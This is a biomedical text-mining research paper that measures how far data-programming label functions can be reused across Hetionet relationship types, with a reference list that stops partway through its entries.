Knowledge bases are important resources that hold complex structured and unstructured information. These resources have been used in important tasks such as network analysis for drug repurposing discovery [1,2,3] or as a source of training labels for text mining systems [4,5,6]. Populating knowledge bases often requires highly trained scientists to read biomedical literature and summarize the results [7]. This time-consuming process is referred to as manual curation. In 2007, researchers estimated that filling a knowledge base via manual curation would require approximately 8.4 years to complete [8]. The rate of publications continues to exponentially increase [9], so using only manual curation to fully populate a knowledge base has become impractical.
Relationship extraction has been studied as a solution towards handling the challenge posed by an exponentially growing body of literature [7]. This process consists of creating an expert system to automatically scan, detect and extract relationships from textual sources. Typically, these systems utilize machine learning techniques that require extensive corpora of well-labeled training data. These corpora are difficult to obtain, because they are constructed via extensive manual curation pipelines.
Distant supervision is a technique also designed to sidestep the dependence on manual curation and quickly generate large training datasets. This technique assumes that positive examples established in selected databases can be applied to any sentence that contains them [4]. The central problem with this technique is that generated labels are often of low quality which results in an expansive amount of false positives [10].
Ratner et al. [11] recently introduced “data programming” as a solution. Data programming is a paradigm that combines distant supervision with simple rules and heuristics written as small programs called label functions. These label functions are consolidated via a noise aware generative model that is designed to produce training labels for large datasets. Using this paradigm can dramatically reduce the time required to obtain sufficient training data; however, writing a useful label function requires a significant amount of time and error analysis. This dependency makes constructing a knowledge base with a myriad of heterogenous relationships nearly impossible as tens or possibly hundreds of label functions are required per relationship type.
In this paper, we seek to accelerate the label function creation process by measuring the extent to which label functions can be re-used across different relationship types. We hypothesize that sentences describing one relationship type may share linguistic features such as keywords or sentence structure with sentences describing other relationship types. We conducted a series of experiments to determine the degree to which label function re-use enhanced performance over distant supervision alone. We focus on relationships that indicate similar types of physical interactions (i.e., gene-binds-gene and compound-binds-gene) as well as different types (i.e., disease-associates-gene and compound-treats-disease). Re-using label functions could dramatically reduce the time required to populate a knowledge base with a multitude of heterogeneous relationships.
Relationship extraction is the process of detecting semantic relationships from a collection of text. This process can be broken down into three different categories: (1) the use of natural language processing techniques such as manually crafted rules and heuristics for relationship extraction (Rule Based Extractors), (2) the use of unsupervised methods such as co-occurrence scores or clustering to find patterns within sentences and documents (Unsupervised Extractors), and (3) the use of supervised or semi-supervised machine learning for classifying the presence of a relation within documents or sentences (Supervised Extractors). In this section, we briefly discuss selected efforts under each category.
#### Rule Based Extractors
Rule based extractors rely heavily on expert knowledge to perform extraction. Typically, these systems use linguistic rules and heuristics to identify key sentences or phrases. For example, a hypothetical extractor focused on protein phosphorylation events would identify sentences containing the phrase “gene X phosphorylates gene Y” [12]. This phrase is a straightforward indication that two genes have a fundamental role in protein phosphorylation. Other phrase extractors have been used to identify drug-disease treatments [13], pharmcogenomic events [14] and protein-protein interactions [15,16]. These extractors provide a simple and effective way to extract sentences; however, they depend on extensive knowledge about the text to be properly constructed.
A sentence’s grammatical structure can also support relationship extraction via dependency trees. Dependency trees are data structures that depict a sentence’s grammatical relation structure in the form of nodes and edges. Nodes represent words and edges represent the dependency type each word shares between one another. For example, a possible extractor would classify sentences as a positive if a sentence contained the following dependency tree path: “gene X (subject)-> promotes (verb)<- cell death (direct object) <- in (preposition) <-tumors (object of preposition)” [17]. This approach provides extremely precise results, but the quantity of positive results remains modest as sentences appear in distinct forms and structure. Because of this limitation, recent approaches have incorporated methods on top of rule based extractors such as co-occurrence and machine learning systems [18,19]. We discuss the pros and cons of added methods in a later section. For this project, we constructed our label functions without the aid of these works; however, approaches discussed in this section provide substantial inspiration for novel label functions in future endeavors.
#### Unsupervised Extractors
Unsupervised extractors detect relationships without the need of annotated text. Notable approaches exploit the fact that two entities can occur together in text. This event is referred to as co-occurrence. Extractors utilize these events by generating statistics on the frequency of entity pairs occurring in text. For example, a possible extractor would say gene X is associated with disease Y, because gene X and disease Y appear together more often than individually [20]. This approach has been used to establish the following relationship types: disease-gene relationships [20,21,22,23,24,25], protein-protein interactions [24,26,27], drug-disease treatments [28], and tissue-gene relations [29]. Extractors using the co-occurrence strategy provide exceptional recall results; however, these methods may fail to detect underreported relationships, because they depend on entity-pair frequency for detection. Junge et al. created a hybrid approach to account for this issue using distant supervision to train a classifier to learn the context of each sentence [30]. Once the classifier was trained, they scored every sentence within their corpus, and each sentence’s score was incorporated into calculating co-occurrence frequencies to establish relationship existence [30]. Co-occurrence approaches are powerful in establishing edges on the global scale; however, they cannot identify individual sentences without the need for supervised methods.
Clustering is an unsupervised approach that extracts relationships from text by grouping similar sentences together. Percha et al. used this technique to group sentences based on their grammatical structure [31]. Using Stanford’s Core NLP Parser [32], a dependency tree was generated for every sentence in each Pubmed abstract [31]. Each tree was clustered based on similarity and each cluster was manually annotated to determine which relationship each group represented [31]. For our project we incorporated the results of this work as domain heuristic label functions. Overall, unsupervised approaches are desirable since they do not require well-annotated training data. Such approaches provide excellent recall; however, performance can be limited in terms of precision when compared to supervised machine learning methods [33,34].
#### Supervised Extractors
Supervised extractors consist of training a machine learning classifier to predict the existence of a relationship within text. These classifiers require access to well-annotated datasets, which are usually created via some form of manual curation. Previous work consists of research experts curating their own datasets to train classifiers [35,36,37,38,39]; however, there have been community-wide efforts to create datasets for shared tasks [40,41,42]. Shared tasks are open challenges that aim to build the best classifier for natural language processing tasks such as named entity tagging or relationship extraction. A notable example is the BioCreative community that hosted a number of shared tasks such as predicting compound-protein interactions (BioCreative VI track 5) [41] and compound induced diseases [42]. Often these datasets are well annotated, but are modest in size (2,432 abstracts for BioCreative VI [41] and 1500 abstracts for BioCreative V [42]). As machine learning classifiers become increasingly complex, these small dataset sizes cannot suffice. Plus, these multitude of datasets are uniquely annotated which can generate noticeable differences in terms of classifier performance [42]. Overall, obtaining large well-annotated datasets still remains as an open non-trivial task.
Before the rise of deep learning, a classifier that was most frequently used was support vector machines. This classifier uses a projection function called a kernel to map data onto a high dimensional space so datapoints can be easily discerned between classes [43]. This method was used to extract disease-gene associations [35,44,45], protein-protein interactions[19,46,47] and protein docking information [48]. Generally, support vector machines perform well on small datasets with large feature spaces but are slow to train as the number of datapoints becomes asymptotically large.
Deep learning has been increasingly popular as these methods can outperform common machine learning methods [49]. Approaches in this field consist of using various neural network architectures, such as recurrent neural networks [50,51,52,53,54,55] and convolutional neural networks [51,54,56,57,58], to extract relationships from text. In fact approaches in this field were the winning model within the BioCreative VI shared task [41,59]. Despite the substantial success of these models, they often require large amounts of data to perform well. Obtaining large datasets is a time-consuming task, which makes training these models a non-trivial challenge. Distant supervision has been used as a solution to fix the barren amount of large datasets [4]. Approaches have used this paradigm to extract chemical-gene interactions [54], disease-gene associations [30] and protein-protein interactions [30,54,60]. In fact, efforts done in [60] served as one of the motivating rationales for our work.
Overall, deep learning has provided exceptional results in terms of relationships extraction. Thus, we decided to use a deep neural network as our discriminative model.
## Methods and Materials
### Hetionet
Hetionet v1 [3] is a large heterogenous network that contains pharmacological and biological information. This network depicts information in the form of nodes and edges of different types: nodes that represent biological and pharmacological entities and edges which represent relationships between entities. Hetionet v1 contains 47,031 nodes with 11 different data types and 2,250,197 edges that represent 24 different relationship types (Figure 1). Edges in Hetionet v1 were obtained from open databases, such as the GWAS Catalog [61] and DrugBank [62]. For this project, we analyzed performance over a subset of the Hetionet v1 edge types: disease associates with a gene (DaG), compound binds to a gene (CbG), compound treating a disease (CtD) and gene interacts with gene (GiG) (bolded in Figure 1).
### Dataset
We used PubTator [63] as input to our analysis. PubTator provides MEDLINE abstracts that have been annotated with well-established entity recognition tools including DNorm [64] for disease mentions, GeneTUKit [65] for gene mentions, Gnorm [66] for gene normalizations and a dictionary based search system for compound mentions [67]. We downloaded PubTator on June 30, 2017, at which point it contained 10,775,748 abstracts. Then we filtered out mention tags that were not contained in Hetionet v1. We used the Stanford CoreNLP parser [32] to tag parts of speech and generate dependency trees. We extracted sentences with two or more mentions, termed candidate sentences. Each candidate sentence was stratified by co-mention pair to produce a training set, tuning set and a testing set (shown in Supplemental Table 2). Each unique co-mention pair was sorted into four categories: (1) in Hetionet v1 and has sentences, (2) in Hetionet v1 and doesn’t have sentences, (3) not in Hetionet v1 and does have sentences and (4) not in Hetionet v1 and doesn’t have sentences. Within these four categories each pair is randomly assigned their own individual partition rank (a continuous number between 0 and 1). Any rank lower than 0.7 is sorted into the training set, while any rank greater than 0.7 and lower than 0.9 is assigned to the tuning set. The rest of the pairs with a rank greater than or equal to 0.9 is assigned to the test set. Sentences that contain more than one co-mention pair are treated as multiple individual candidates. We hand labeled five hundred to a thousand candidate sentences of each edge type to obtain a ground truth set (Supplemental Table 2)1.
### Label Functions for Annotating Sentences
The challenge of having too few ground truth annotations is common to many natural language processing settings, even when unannotated text is abundant. Data programming circumvents this issue by quickly annotating large datasets by using multiple noisy signals emitted by label functions [11]. Label functions are simple pythonic functions that emit: a positive label (1), a negative label (-1) or abstain from emitting a label (0). These functions can be grouped into multiple categories (see Supplement Methods). We combined these functions using a generative model to output a single annotation, which is a consensus probability score bounded between 0 (low chance of mentioning a relationship) and 1 (high chance of mentioning a relationship). We used these annotations to train a discriminative model that makes the final classification step.
### Experimental Design
Being able to re-use label functions across edge types would substantially reduce the number of label functions required to extract multiple relationships from biomedical literature. We first established a baseline by training a generative model using only distant supervision label functions designed for the target edge type (see Supplemental Methods). For example, in the Gene interacts Gene (GiG) edge type we used label functions that returned a 1 if the pair of genes were included in the Human Interaction database [68], the iRefIndex database [69] or in the Incomplete Interactome database [70]. Then we compared the baseline model with models that also included text and domain-heuristic label functions. Using a sampling with replacement approach, we sampled these text and domain-heuristic label functions separately within edge types, across edge types, and from a pool of all label functions. We compared within-edge-type performance to across-edge-type and all-edge-type performance. For each edge type we sampled a fixed number of label functions consisting of five evenly spaced numbers between one and the total number of possible label functions. We repeated this sampling process 50 times for each point. Furthermore, at each point we also trained the discriminative model using annotations from the generative model trained on edge-specific label functions (see Supplemental Methods). We report performance of both models in terms of the area under the receiver operating characteristic curve (AUROC) and the area under the precision-recall curve (AUPR). Ensuing model evaluations, we quantified the number of edges we could incorporate into Hetionet v1. Using a calibrated discriminative model (see Supplemental Methods), we scored every candidate sentence within our dataset and grouped candidates based on their mention pair. We took the max score within each candidate group and this score represents the probability of the existence of an edge. We established edges by using a cutoff score that produced an equal error rate between the false positives and false negatives. We report the number of preexisting edges we could recall as well as the number of novel edges we can incorporate. Lastly, we compared our framework with a previously established unsupervised approach [30].
## Results
### Generative Model Using Randomly Sampled Label Functions
Creating label functions is a labor-intensive process that can take days to accomplish. We sought to accelerate this process by measuring the extent to which label functions can be reused. Our hypothesis was that certain edge types share similar linguistic features such as keywords and/or sentence structure. This shared characteristic would make certain edge types amenable to label function reuse. We designed a set of experiments to test this hypothesis on an individual level (edge vs edge) as well as a global level (collective pool of sources). We observed that performance increased when edge-specific label functions were added to an edge-specific baseline model, while label function reuse usually provided less benefit (AUROC Figure 2, AUPR Supplemental Figure 5). We also evaluated randomly selecting label functions from among all sets and observed similar performance (AUROC Supplemental Figure 6, AUPR Supplemental Figure 7) The quintessential example of this overarching trend is the Compound treats Disease (CtD) edge type, where edge-specific label functions always outperformed transferred label functions. However, there are hints of label function transferability for selected edge types and label function sources. Performance increases as more CbG label functions are incorporated to the GiG baseline model and vice versa. This suggests that sentences for GiG and CbG may share similar linguistic features or terminology that allows for label functions to be reused. Perplexingly, edge-specific Disease associates Gene (DaG) label functions did not improve performance over label functions drawn from other edge types. Overall, only CbG and GiG showed significant signs of reusability which suggests label functions could be shared between the two edge types.
We found that sampling from all label function sources at once usually underperformed relative to edge-specific label functions (Supplemental Figures 6 and 7). As more label functions were sampled, the gap between edge-specific sources and all sources widened. CbG is a prime example of this trend (Supplemental Figures 6 and 7), while CtD and GiG show a similar but milder trend. DaG was the exception to the general rule: the pooled set of label functions improved performance over the edge-specific ones, which aligns with the previously observed results for individual edge types (Figure 2). The decreasing trend when pooling all label functions supports the notion that label functions cannot easily transfer between edge types (exception being CbG on GiG and vice versa).
### Discriminative Model Performance
The discriminative model is designed to augment performance over the generative model by incorporating textual features along with estimated training labels. The discriminative model is a piecewise convolutional neural network trained over word embeddings (See Methods and Materials). We found that the discriminative model generally out-performed the generative model as more edge-specific label functions are incorporated (Figure 3 and Supplemental Figure 8). The discriminative model’s performance is often poorest when very few edge-specific label functions are added to the baseline model (seen in Disease associates Gene (DaG), Compound binds Gene (CbG) and Gene interacts Gene (GiG)). This suggests that generative models trained with more label functions produce outputs that are more suitable for training discriminative models. An exception to this trend is Compound treats Disease (CtD) where the discriminative model out-performs the generative model at all levels of sampling. We observed the opposite trend with the Compound-binds-Gene (CbG) edges: the discriminative model was always poorer or indistinguishable from the generative model. Interestingly, the AUPR for CbG plateaus below the generative model and decreases when all edge-specific label functions are used (Supplemental Figure 8). This suggests that the discriminative model might be predicting more false positives in this setting. Incorporating more edge-specific label functions usually improves performance for the discriminative model over the generative model.
## Discussion
We measured the extent to which label functions can be re-used across multiple edge types to extract relationships from literature. Through our sampling experiment, we found that adding edge-specific label functions increases performance for the generative model (Figure 2). We found that label functions designed from relatively related edge types can increase performance (Gene interacts Gene (GiG) label functions predicting the Compound binds Gene (CbG) edge and vice versa), while the Disease associates Gene (DaG) edge type remained agnostic to label function sources (Figure 2 and Supplemental Figure 5). Furthermore, we found that using all label functions at once generally hurts performance with the exception being the DaG edge type (Supplemental Figures 6 and 7). One possibility for this observation is that DaG is a broadly defined edge type. For example, DaG may contain many concepts related to other edge types such as Disease (up/down) regulating a Gene, which makes it more agnostic to label function sources (examples highlighted in our annotated sentences).
Regarding the discriminative model, adding edge-specific label function substantially improved performance for two out of the four edge types (Compound treats Disease (CtD) and Disease associates Gene (DaG)) (Figure 3 and Supplemental Figure 8). Gene interacts Gene (GiG) and Compound binds Gene (CbG) discriminative models showed minor improvements compared to the generative model, but only when nearly all edge-specific label functions are included (Figure 3 and Supplemental Figure 8). We came across a large amount of spurious gene mentions when working with the discriminative model and believe that these mentions contributed to CbG and GiG’s hindered performance. We encountered difficulty in calibrating each discriminative model (Supplemental Figure 9). The temperature scaling algorithm appears to improve calibration for the highest scores for each model but did not successfully calibrate throughout the entire range of predictions. Improving performance for all predictions may require more labeled examples or may be a limitation of the approach in this setting. Even with these limitations, this early-stage approach could recall many existing edges from an existing knowledge base, Hetionet v1, and suggest many new high-confidence edges for inclusion (Supplemental Figure 10). Our findings suggest that further work, including an expansion of edge types and a move to full text from abstracts, may make this approach suitable for building continuously updated knowledge bases to address drug repositioning and other biomedical challenges.
## Conclusion and Future Direction
Filling out knowledge bases via manual curation can be an arduous and erroneous task [8]. As the rate of publications increases, relying on manual curation alone becomes impractical. Data programming, a paradigm that uses label functions as a means to speed up the annotation process, can be used as a solution for this problem. An obstacle for this paradigm, however, is creating useful label functions, which takes a considerable amount of time. We tested the feasibility of reusing label functions as a way to reduce the total number of label functions required for strong prediction performance. We conclude that label functions may be re-used with closely related edge types, but that re-use does not improve performance for most pairings. The discriminative model’s performance improves as more edge-specific label functions are incorporated into the generative model; however, we did notice that performance greatly depends on the annotations provided by the generative model.
This work sets up the foundation for creating a common framework that mines text to create edges. Within this framework we would continuously incorporate new knowledge as novel findings are published, while providing a single confidence score for an edge via sentence score consolidation. As opposed to many existing knowledge graphs (for example, Hetionet v1 where text-derived edges generally cannot be exactly attributed to excerpts from literature [3,71]), our approach has the potential to annotate each edge based on its source sentences. In addition, edges generated with this approach would be unencumbered from upstream licensing or copyright restrictions, enabling openly licensed hetnets at a scale not previously possible [72,73,74]. New multitask learning [75] strategies may make it even more practical to reuse label functions to construct continuously updating literature-derived knowledge graphs.
## Supplemental Information
An online version of this manuscript is available at https://greenelab.github.io/text_mined_hetnet_manuscript/. Source code for this work is available under open licenses at: https://github.com/greenelab/snorkeling/.
## Acknowledgements
The authors would like to thank Christopher Ré’s group at Stanford University, especially Alex Ratner and Steven Bach, for their assistance with this project. We also want to thank Graciela Gonzalez-Hernandez for her advice and input with this project. This work was support by Grant GBMF4552 from the Gordon Betty Moore Foundation.
## References
1. Graph Theory Enables Drug Repurposing – How a Mathematical Model Can Drive the Discovery of Hidden Mechanisms of Action
Ruggero Gramatica, T. Di Matteo, Stefano Giorgetti, Massimo Barbiani, Dorian Bevec, Tomaso Aste
PLoS ONE (2014-01-09) https://doi.org/gf45zp
DOI: 10.1371/journal.pone.0084912 · PMID: 24416311 · PMCID: PMC3886994
2. Drug repurposing through joint learning on knowledge graphs and literature
Mona Alshahrani, Robert Hoehndorf
Cold Spring Harbor Laboratory (2018-08-06) https://doi.org/gf45zk
DOI: 10.1101/385617
3. Systematic integration of biomedical knowledge prioritizes drugs for repurposing
Daniel Scott Himmelstein, Antoine Lizee, Christine Hessler, Leo Brueggeman, Sabrina L Chen, Dexter Hadley, Ari Green, Pouya Khankhanian, Sergio E Baranzini
eLife (2017-09-22) https://doi.org/cdfk
DOI: 10.7554/elife.26726 · PMID: 28936969 · PMCID: PMC5640425
4. Distant supervision for relation extraction without labeled data
Mike Mintz, Steven Bills, Rion Snow, Dan Jurafsky
Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP: Volume 2 - ACL-IJCNLP ’09 (2009) https://doi.org/fg9q43
DOI: 10.3115/1690219.1690287
5. CoCoScore: Context-aware co-occurrence scoring for text mining applications using distant supervision
Alexander Junge, Lars Juhl Jensen
Cold Spring Harbor Laboratory (2018-10-16) https://doi.org/gf45zm
DOI: 10.1101/444398
6. Knowledge-guided convolutional networks for chemical-disease relation extraction
Huiwei Zhou, Chengkun Lang, Zhuang Liu, Shixian Ning, Yingyu Lin, Lei Du
BMC Bioinformatics (2019-05-21) https://doi.org/gf45zn
DOI: 10.1186/s12859-019-2873-7 · PMID: 31113357 · PMCID: PMC6528333
7. Facts from text: can text mining help to scale-up high-quality manual curation of gene products with ontologies?
R. Winnenburg, T. Wachter, C. Plake, A. Doms, M. Schroeder
Briefings in Bioinformatics (2008-07-11) https://doi.org/bfsnwg
DOI: 10.1093/bib/bbn043 · PMID: 19060303
8. Manual curation is not sufficient for annotation of genomic databases
William A. Baumgartner Jr, K. Bretonnel Cohen, Lynne M. Fox, George Acquaah-Mensah, Lawrence Hunter
Bioinformatics (2007-07-01) https://doi.org/dtck86
DOI: 10.1093/bioinformatics/btm229 · PMID: 17646325 · PMCID: PMC2516305
9. Growth rates of modern science: A bibliometric analysis based on the number of publications and cited references
Lutz Bornmann, Rüdiger Mutz
Journal of the Association for Information Science and Technology (2015-04-29) https://doi.org/gfj5zc
DOI: 10.1002/asi.23329
10. Revisiting distant supervision for relation extraction
Tingsong Jiang, Jing Liu, Chin-Yew Lin, Zhifang Sui
LREC (2018)
11. Data Programming: Creating Large Training Sets, Quickly
Alexander Ratner, Christopher De Sa, Sen Wu, Daniel Selsam, Christopher Ré
arXiv (2016-05-25) https://arxiv.org/abs/1605.07723v3
12. RLIMS-P 2.0: A Generalizable Rule-Based Information Extraction System for Literature Mining of Protein Phosphorylation Information
Manabu Torii, Cecilia N. Arighi, Gang Li, Qinghua Wang, Cathy H. Wu, K. Vijay-Shanker
IEEE/ACM Transactions on Computational Biology and Bioinformatics (2015-01-01) https://doi.org/gf8fpv
DOI: 10.1109/tcbb.2014.2372765 · PMID: 26357075 · PMCID: PMC4568560
13. Large-scale extraction of accurate drug-disease treatment pairs from biomedical literature for drug repurposing
Rong Xu, QuanQiu Wang
BMC Bioinformatics (2013-06-06) https://doi.org/gb8v3k
DOI: 10.1186/1471-2105-14-181 · PMID: 23742147 · PMCID: PMC3702428
14. Pharmspresso: a text mining tool for extraction of pharmacogenomic concepts and relationships from full text
Yael Garten, Russ B Altman
BMC Bioinformatics (2009-02) https://doi.org/df75hq
DOI: 10.1186/1471-2105-10-s2-s6 · PMID: 19208194 · PMCID: PMC2646239
15. PPInterFinder—a mining tool for extracting causal relations on human proteins from literature
Kalpana Raja, Suresh Subramani, Jeyakumar Natarajan
Database (2013-01-01) https://doi.org/gf479b
DOI: 10.1093/database/bas052 · PMID: 23325628 · PMCID: PMC3548331
16. HPIminer: A text mining system for building and visualizing human protein interaction networks and pathways
Suresh Subramani, Raja Kalpana, Pankaj Moses Monickaraj, Jeyakumar Natarajan
Journal of Biomedical Informatics (2015-04) https://doi.org/f7bgnr
DOI: 10.1016/j.jbi.2015.01.006 · PMID: 25659452
17. PKDE4J: Entity and relation extraction for public knowledge discovery.
Min Song, Won Chul Kim, Dahee Lee, Go Eun Heo, Keun Young Kang
Journal of biomedical informatics (2015-08-12) https://www.ncbi.nlm.nih.gov/pubmed/26277115
DOI: 10.1016/j.jbi.2015.08.008 · PMID: 26277115
18. Textpresso Central: a customizable platform for searching, text mining, viewing, and curating biomedical literature
H.-M. Müller, K. M. Van Auken, Y. Li, P. W. Sternberg
BMC Bioinformatics (2018-03-09) https://doi.org/gf7rbz
DOI: 10.1186/s12859-018-2103-8 · PMID: 29523070 · PMCID: PMC5845379
19. LimTox: a web tool for applied text mining of adverse event and toxicity associations of compounds, drugs and genes
Andres Cañada, Salvador Capella-Gutierrez, Obdulia Rabal, Julen Oyarzabal, Alfonso Valencia, Martin Krallinger
Nucleic Acids Research (2017-05-22) https://doi.org/gf479h
DOI: 10.1093/nar/gkx462 · PMID: 28531339 · PMCID: PMC5570141
20. DISEASES: Text mining and data integration of disease–gene associations
Sune Pletscher-Frankild, Albert Pallejà, Kalliopi Tsafou, Janos X. Binder, Lars Juhl Jensen
Methods (2015-03) https://doi.org/f3mn6s
DOI: 10.1016/j.ymeth.2014.11.020 · PMID: 25484339
21. PolySearch2: a significantly improved text-mining system for discovering associations between human diseases, genes, drugs, metabolites, toxins and more
Yifeng Liu, Yongjie Liang, David Wishart
Nucleic Acids Research (2015-04-29) https://doi.org/f7nzn5
DOI: 10.1093/nar/gkv383 · PMID: 25925572 · PMCID: PMC4489268
22. The research on gene-disease association based on text-mining of PubMed
Jie Zhou, Bo-quan Fu
BMC Bioinformatics (2018-02-07) https://doi.org/gf479k
DOI: 10.1186/s12859-018-2048-y · PMID: 29415654 · PMCID: PMC5804013
23. LGscore: A method to identify disease-related genes using biological literature and Google data
Jeongwoo Kim, Hyunjin Kim, Youngmi Yoon, Sanghyun Park
Journal of Biomedical Informatics (2015-04) https://doi.org/f7bj9c
DOI: 10.1016/j.jbi.2015.01.003 · PMID: 25617670
24. A comprehensive and quantitative comparison of text-mining in 15 million full-text articles versus their corresponding abstracts
David Westergaard, Hans-Henrik Stærfeldt, Christian Tønsberg, Lars Juhl Jensen, Søren Brunak
PLOS Computational Biology (2018-02-15) https://doi.org/gcx747
DOI: 10.1371/journal.pcbi.1005962 · PMID: 29447159 · PMCID: PMC5831415
25. Literature Mining for the Discovery of Hidden Connections between Drugs, Genes and Diseases
Raoul Frijters, Marianne van Vugt, Ruben Smeets, René van Schaik, Jacob de Vlieg, Wynand Alkema
PLoS Computational Biology (2010-09-23) https://doi.org/bhrw7x
DOI: 10.1371/journal.pcbi.1000943 · PMID: 20885778 · PMCID: PMC2944780
26. Analyzing a co-occurrence gene-interaction network to identify disease-gene association
Amira Al-Aamri, Kamal Taha, Yousof Al-Hammadi, Maher Maalouf, Dirar Homouz
BMC Bioinformatics (2019-02-08) https://doi.org/gf49nm
DOI: 10.1186/s12859-019-2634-7 · PMID: 30736752 · PMCID: PMC6368766
27. COMPARTMENTS: unification and visualization of protein subcellular localization evidence
J. X. Binder, S. Pletscher-Frankild, K. Tsafou, C. Stolte, S. I. O’Donoghue, R. Schneider, L. J. Jensen
Database (2014-02-25) https://doi.org/btbm
DOI: 10.1093/database/bau012 · PMID: 24573882 · PMCID: PMC3935310
28. A new method for prioritizing drug repositioning candidates extracted by literature-based discovery
2015 IEEE International Conference on Bioinformatics and Biomedicine (BIBM) (2015-11) https://doi.org/gf479j
DOI: 10.1109/bibm.2015.7359766
29. Comprehensive comparison of large-scale tissue expression datasets
Alberto Santos, Kalliopi Tsafou, Christian Stolte, Sune Pletscher-Frankild, Seán I. O’Donoghue, Lars Juhl Jensen
PeerJ (2015-06-30) https://doi.org/f3mn6p
DOI: 10.7717/peerj.1054 · PMID: 26157623 · PMCID: PMC4493645
30. CoCoScore: context-aware co-occurrence scoring for text mining applications using distant supervision
Alexander Junge, Lars Juhl Jensen
Bioinformatics (2019-06-14) https://doi.org/gf4789
DOI: 10.1093/bioinformatics/btz490 · PMID: 31199464
31. A global network of biomedical relationships derived from text
Bethany Percha, Russ B Altman
Bioinformatics (2018-02-27) https://doi.org/gc3ndk
DOI: 10.1093/bioinformatics/bty114 · PMID: 29490008 · PMCID: PMC6061699
32. The Stanford CoreNLP Natural Language Processing Toolkit
Christopher Manning, Mihai Surdeanu, John Bauer, Jenny Finkel, Steven Bethard, David McClosky
Proceedings of 52nd Annual Meeting of the Association for Computational Linguistics: System Demonstrations (2014) https://doi.org/gf3xhp
DOI: 10.3115/v1/p14-5010
33. Literature mining for the biologist: from information retrieval to biological discovery
Lars Juhl Jensen, Jasmin Saric, Peer Bork
Nature Reviews Genetics (2006-02) https://doi.org/bgq7q9
DOI: 10.1038/nrg1768 · PMID: 16418747
34. Application of text mining in the biomedical domain
Wilco W. M. Fleuren, Wynand Alkema
Methods (2015-03) https://doi.org/f64p6n
DOI: 10.1016/j.ymeth.2015.01.015 · PMID: 25641519
35. Extraction of relations between genes and diseases from text and large-scale data analysis: implications for translational research
Àlex Bravo, Janet Piñero, Núria Queralt-Rosinach, Michael Rautschka, Laura I Furlong
BMC Bioinformatics (2015-02-21) https://doi.org/f7kn8s
DOI: 10.1186/s12859-015-0472-9 · PMID: 25886734 · PMCID: PMC4466840
36. The EU-ADR corpus: Annotated drugs, diseases, targets, and their relationships
Erik M. van Mulligen, Annie Fourrier-Reglat, David Gurwitz, Mariam Molokhia, Ainhoa Nieto, Gianluca Trifiro, Jan A. Kors, Laura I. Furlong
Journal of Biomedical Informatics (2012-10) https://doi.org/f36vn6
DOI: 10.1016/j.jbi.2012.04.004 · PMID: 22554700
37. Comparative experiments on learning information extractors for proteins and their interactions
Razvan Bunescu, Ruifang Ge, Rohit J. Kate, Edward M. Marcotte, Raymond J. Mooney, Arun K. Ramani, Yuk Wah Wong
Artificial Intelligence in Medicine (2005-02) https://doi.org/dhztpn
DOI: 10.1016/j.artmed.2004.07.016 · PMID: 15811782
38. BioInfer: a corpus for information extraction in the biomedical domain
Sampo Pyysalo, Filip Ginter, Juho Heimonen, Jari Björne, Jorma Boberg, Jouni Järvinen, Tapio Salakoski
BMC Bioinformatics (2007-02-09) https://doi.org/b7bhhc
DOI: 10.1186/1471-2105-8-50 · PMID: 17291334 · PMCID: PMC1808065
39. RelEx–Relation extraction using dependency parse trees
K. Fundel, R. Kuffner, R. Zimmer
Bioinformatics (2006-12-01) https://doi.org/cz7q4d
DOI: 10.1093/bioinformatics/btl616 · PMID: 17142812
40. BioCreative V CDR task corpus: a resource for chemical disease relation extraction
Jiao Li, Yueping Sun, Robin J. Johnson, Daniela Sciaky, Chih-Hsuan Wei, Robert Leaman, Allan Peter Davis, Carolyn J. Mattingly, Thomas C. Wiegers, Zhiyong Lu
Database (2016) https://doi.org/gf5hfw
DOI: 10.1093/database/baw068 · PMID: 27161011 · PMCID: PMC4860626
41. Overview of the biocreative vi chemical-protein interaction track
Martin Krallinger, Obdulia Rabal, Saber A Akhondi, others
Proceedings of the sixth biocreative challenge evaluation workshop (2017) https://www.semanticscholar.org/paper/Overview-of-the-BioCreative-VI-chemical-protein-Krallinger-Rabal/eed781f498b563df5a9e8a241c67d63dd1d92ad5
42. Comparative analysis of five protein-protein interaction corpora
Sampo Pyysalo, Antti Airola, Juho Heimonen, Jari Björne, Filip Ginter, Tapio Salakoski
BMC Bioinformatics (2008-04) https://doi.org/fh3df7
DOI: 10.1186/1471-2105-9-s3-s6 · PMID: 18426551 · PMCID: PMC2349296
43. Support vector machines
M. A. Hearst, S. T. Dumais, E. Osuna, J. Platt, B. Scholkopf
IEEE Intelligent Systems and their Applications (1998-07) https://doi.org/fwgxrj
DOI: 10.1109/5254.708428
44. DTMiner: identification of potential disease targets through biomedical literature mining
Dong Xu, Meizhuo Zhang, Yanping Xie, Fan Wang, Ming Chen, Kenny Q. Zhu, Jia Wei
Bioinformatics (2016-08-09) https://doi.org/f9nw36
DOI: 10.1093/bioinformatics/btw503 · PMID: 27506226 · PMCID: PMC5181534
45. Automatic extraction of gene-disease associations from literature using joint ensemble learning
Balu Bhasuran, Jeyakumar Natarajan
PLOS ONE (2018-07-26) https://doi.org/gdx63f
DOI: 10.1371/journal.pone.0200699 · PMID: 30048465 · PMCID: PMC6061985
46. Exploiting graph kernels for high performance biomedical relation extraction
Nagesh C. Panyam, Karin Verspoor, Trevor Cohn, Kotagiri Ramamohanarao
Journal of Biomedical Semantics (2018-01-30) https://doi.org/gf49nn
DOI: 10.1186/s13326-017-0168-3 · PMID: 29382397 · PMCID: PMC5791373
47. LPTK: a linguistic pattern-aware dependency tree kernel approach for the BioCreative VI CHEMPROT task
Neha Warikoo, Yung-Chun Chang, Wen-Lian Hsu
Database (2018-01-01) https://doi.org/gfhjr6
DOI: 10.1093/database/bay108 · PMID: 30346607 · PMCID: PMC6196310
48. Text Mining for Protein Docking
Varsha D. Badal, Petras J. Kundrotas, Ilya A. Vakser
PLOS Computational Biology (2015-12-09) https://doi.org/gcvj3b
DOI: 10.1371/journal.pcbi.1004630 · PMID: 26650466 · PMCID: PMC4674139
49. Deep learning in neural networks: An overview
Jürgen Schmidhuber
Neural Networks (2015-01) https://doi.org/f6v78n
DOI: 10.1016/j.neunet.2014.09.003 · PMID: 25462637
50. Feature assisted stacked attentive shortest dependency path based Bi-LSTM model for protein–protein interaction
Shweta Yadav, Asif Ekbal, Sriparna Saha, Ankit Kumar, Pushpak Bhattacharyya
Knowledge-Based Systems (2019-02) https://doi.org/gf4788
DOI: 10.1016/j.knosys.2018.11.020
51. Extracting chemical–protein relations with ensembles of SVM and deep learning models
